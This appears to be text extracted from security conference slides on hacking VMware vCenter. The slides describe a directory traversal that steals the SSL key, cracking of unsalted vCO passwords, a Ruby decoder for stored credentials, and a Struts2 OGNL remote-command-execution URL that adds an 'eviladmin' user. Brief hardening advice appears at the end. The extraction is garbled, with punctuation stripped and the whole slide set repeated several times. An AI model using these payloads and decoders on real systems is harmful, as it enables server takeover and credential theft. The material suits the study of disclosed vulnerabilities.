bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
